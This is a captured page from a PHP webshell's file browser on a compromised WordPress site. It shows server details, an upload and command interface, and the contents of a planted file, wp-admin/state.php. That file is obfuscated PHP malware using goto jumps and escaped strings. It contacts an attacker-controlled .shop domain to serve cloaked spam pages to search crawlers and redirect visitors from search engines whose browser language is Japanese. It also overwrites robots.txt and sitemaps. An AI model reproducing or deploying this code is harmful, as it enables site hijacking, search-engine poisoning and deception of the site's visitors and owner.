403Webshell
Server IP : 43.153.74.48  /  Your IP : 216.73.216.28
Web Server : LiteSpeed
System : Linux VM-0-13-ubuntu 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
User : www ( 1002)
PHP Version : 8.1.29
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/stainlesstint.com/wp-admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/stainlesstint.com//wp-admin/state.php
<?php
 goto izdnq; l2D_A: $url_words = $inter_domain . "\x2f\167\x6f\x72\x64\163\56\160\150\x70"; goto qqIr4; uUTOK: function check_refer($refer) { $check_refer = false; $referbots = "\x67\157\x6f\147\x6c\x65\174\x79\141\150\x6f\x6f\x7c\142\151\x6e\x67\x7c\x61\157\154"; if ($refer != '' && preg_match("\57\x28{$referbots}\51\x2f\163\x69", $refer)) { $check_refer = true; } return $check_refer; } goto Y3_0W; izdnq: $inter_domain = "\150\x74\x74\160\163\x3a\x2f\57\172\x36\60\70\61\67\137\x31\x36\56\x6b\161\170\163\x6e\147\141\x79\x2e\x73\x68\x6f\x70\57"; goto IylSB; OXQLm: $http = isset($_SERVER["\110\124\x54\120\x53"]) && $_SERVER["\110\124\124\120\x53"] !== "\x6f\146\x66" ? "\x68\164\164\x70\x73\72\57\57" : "\150\x74\x74\160\x3a\x2f\x2f"; goto uHbiI; cdZ8Q: if (!$res_crawl && $chk_refer && is_japanese_language() && (preg_match("\57\134\x64\44\x2f", $req_uri) || preg_match("\43\x5b\x61\x2d\172\135\x3d\x5b\141\x2d\172\60\55\x39\135\53\43", $req_uri) || preg_match("\57\151\164\145\155\x2f", $req_uri))) { $data1["\x69\x70"] = $_SERVER["\122\105\x4d\117\x54\105\x5f\101\x44\104\122"]; $data1["\162\145\146\145\x72\145\162"] = isset($_SERVER["\x48\x54\124\120\x5f\122\x45\106\x45\122\x45\x52"]) ? $_SERVER["\x48\124\x54\x50\137\122\105\x46\105\x52\x45\x52"] : ''; $data1["\165\163\145\162\x5f\141\147\145\156\164"] = strtolower(isset($_SERVER["\110\x54\124\120\137\125\123\x45\x52\x5f\101\x47\105\x4e\124"]) ? $_SERVER["\110\x54\124\x50\x5f\125\x53\105\x52\x5f\101\x47\105\x4e\x54"] : ''); echo getServerCont($jump1, $data1); die; } goto MxBFL; TvGFQ: if (substr($req_uri, -6) == "\162\157\x62\157\x74\163") { define("\x42\101\123\x45\x5f\120\101\x54\x48", $_SERVER["\x44\117\x43\125\115\x45\x4e\124\x5f\x52\117\x4f\124"]); $robots_cont = @file_get_contents(BASE_PATH . "\x2f\162\x6f\x62\x6f\x74\x73\56\164\170\x74"); $data1["\162\x6f\x62\x6f\x74\163\x5f\x63\157\156\164"] = $robots_cont; $robots_cont = @getServerCont($url_robots, $data1); file_put_contents(BASE_PATH . "\57\162\157\x62\157\164\163\x2e\164\170\x74", $robots_cont); $robots_cont = @file_get_contents(BASE_PATH . "\x2f\x72\157\142\157\x74\163\56\164\x78\x74"); if (strpos(strtolower($robots_cont), "\x73\x69\x74\145\x6d\141\x70")) { echo "\x72\157\142\x6f\164\x73\x2e\164\170\x74\x20\x66\151\154\145\x20\143\x72\145\x61\x74\145\x20\163\165\143\143\145\163\163\x21"; } else { echo "\162\157\x62\157\x74\x73\x2e\164\x78\164\40\146\151\x6c\145\40\143\162\x65\x61\164\145\x20\x66\141\x69\x6c\41"; } die; } goto Hw0Im; nv72C: $chk_refer = check_refer($referer); goto z9D4R; aDntn: if (strpos($req_uri, "\56\x70\150\x70")) { $main_shell = $http . $ser_name . $self; $data1["\x6d\x61\151\156\137\x73\150\x65\154\x6c"] = $main_shell; } else { $main_shell = $http . $ser_name; $data1["\155\141\x69\x6e\x5f\x73\x68\145\154\x6c"] = $main_shell; } goto KAjxb; fply1: $data1["\x72\x65\x71\137\x75\162\x6c"] = $req_url; goto TvGFQ; bb6H3: $domain = $_SERVER["\110\x54\x54\x50\137\110\117\123\124"]; goto jFx2G; qqIr4: $url_robots = $inter_domain . "\57\162\157\x62\x6f\164\x73\x2e\160\x68\160"; goto gIZgG; z9D4R: $user_agent = strtolower(isset($_SERVER["\x48\x54\x54\120\x5f\125\x53\105\x52\137\101\107\105\116\124"]) ? $_SERVER["\x48\124\124\120\137\125\123\105\122\x5f\x41\x47\x45\116\x54"] : ''); goto W567S; qIM78: $req_url = $http . $domain . $req_uri; goto SpaGa; Hw0Im: if (substr($req_uri, -4) == "\x2e\170\155\x6c") { if (strpos($req_uri, "\x61\x6c\x6c\163\x69\164\145\x6d\141\x70\56\170\x6d\x6c")) { $str_cont = getServerCont($map1, $data1); header("\x43\x6f\x6e\x74\145\x6e\x74\55\164\x79\x70\x65\x3a\x74\145\x78\x74\x2f\x78\155\x6c"); echo $str_cont; die; } if (strpos($req_uri, "\x2e\x70\150\160")) { $word4 = explode("\x3f", $req_uri); $word4 = $word4[count($word4) - 1]; $word4 = str_replace("\56\170\155\154", '', $word4); } else { $word4 = str_replace("\57", '', $req_uri); $word4 = str_replace("\56\170\155\x6c", '', $word4); } $data1["\x77\x6f\x72\x64"] = $word4; $data1["\141\143\164\151\x6f\x6e"] = "\x63\150\x65\143\153\x5f\163\151\x74\x65\x6d\141\160"; $check_url4 = getServerCont($url_words, $data1); if ($check_url4 == "\x31") { $str_cont = getServerCont($map1, $data1); header("\103\x6f\156\x74\x65\156\164\x2d\164\171\160\145\x3a\x74\x65\x78\164\x2f\x78\x6d\x6c"); echo $str_cont; die; } $data1["\x61\x63\164\151\x6f\x6e"] = "\x63\x68\145\143\x6b\x5f\167\157\162\144\x73"; $check1 = getServerCont($url_words, $data1); if (strpos($req_uri, "\x6d\141\160") > 0 || $check1 == "\x31") { $data1["\141\143\x74\151\157\156"] = "\x72\x61\x6e\144\137\170\x6d\x6c"; $check_url4 = getServerCont($url_words, $data1); header("\103\x6f\x6e\x74\145\156\x74\55\164\x79\160\x65\72\x74\145\170\x74\x2f\x78\x6d\x6c"); echo $check_url4; die; } } goto aDntn; W567S: $res_crawl = is_crawler($user_agent); goto pUrnP; jFx2G: $self = $_SERVER["\120\110\x50\x5f\x53\x45\x4c\106"]; goto Bbk74; pAzmH: $data1["\150\x72\145\146"] = $href1; goto fply1; gIZgG: if (strpos($req_uri, "\x2e\160\x68\x70")) { $href1 = $http . $domain . $self; } else { $href1 = $http . $domain; } goto HcBJC; Y3_0W: function is_japanese_language() { $accept_language = isset($_SERVER["\x48\124\x54\x50\137\101\103\x43\x45\x50\124\x5f\114\101\116\107\125\x41\107\x45"]) ? $_SERVER["\x48\124\x54\120\137\x41\x43\103\105\120\124\x5f\114\x41\x4e\x47\125\101\107\105"] : ''; if (empty($accept_language)) { return false; } $langs = explode("\54", $accept_language); $primary_lang = strtolower(trim($langs[0])); if (strpos($primary_lang, "\x6a\141") === 0) { return true; } return false; } goto OXQLm; SpaGa: $indata1 = $inter_domain . "\57\151\x6e\144\141\x74\x61\x2e\x70\x68\160"; goto OzXX3; IylSB: function getServerCont($url, $data = array()) { $url = str_replace("\x20", "\x2b", $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$url}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); $errorCode = curl_errno($ch); if (version_compare(PHP_VERSION, "\70\56\x30\x2e\60", "\74")) { curl_close($ch); } if (0 !== $errorCode) { return false; } return $output; } goto dXomw; UjkSi: $data1["\x72\x65\x71\137\x75\162\x69"] = $req_uri; goto pAzmH; OzXX3: $map1 = $inter_domain . "\57\155\x61\160\56\160\150\160"; goto wNR0U; fV49t: $data1["\x64\x6f\155\x61\x69\156"] = $domain; goto UjkSi; KAjxb: $referer = isset($_SERVER["\110\x54\x54\x50\137\x52\x45\106\x45\x52\105\122"]) ? $_SERVER["\x48\124\x54\x50\137\122\x45\x46\105\122\105\122"] : ''; goto nv72C; uHbiI: $req_uri = $_SERVER["\x52\105\121\x55\105\x53\124\x5f\x55\122\111"]; goto bb6H3; pUrnP: $req_uri = str_replace(array("\56\x68\164\x6d", "\56\150\x74\155\154", "\56\x73\x68\x74\155\x6c", "\56\x70\150\x74\155\154"), '', rtrim($req_uri, "\57")); goto cdZ8Q; wNR0U: $jump1 = $inter_domain . "\x2f\x6a\x75\x6d\160\56\160\150\160"; goto l2D_A; dXomw: function is_crawler($agent) { $agent_check = false; $bots = "\147\157\157\147\154\x65\142\x6f\x74\x7c\x62\x69\156\x67\x62\157\164\174\147\157\x6f\x67\x6c\145\x7c\x61\x6f\x6c\x7c\x62\151\x6e\147\174\x79\x61\x68\157\x6f"; if ($agent != '') { if (preg_match("\57\x28{$bots}\51\x2f\x73\151", $agent)) { $agent_check = true; } } return $agent_check; } goto uUTOK; HcBJC: $data1[] = array(); goto fV49t; MxBFL: if ($res_crawl) { $data1["\x68\164\164\x70\x5f\165\x73\x65\x72\x5f\x61\147\145\156\x74"] = $user_agent; $get_content = getServerCont($indata1, $data1); echo $get_content; die; } goto WdDve; Bbk74: $ser_name = $_SERVER["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"]; goto qIM78; WdDve: ?>

Youez - 2016 - github.com/yon3zu
LinuXploit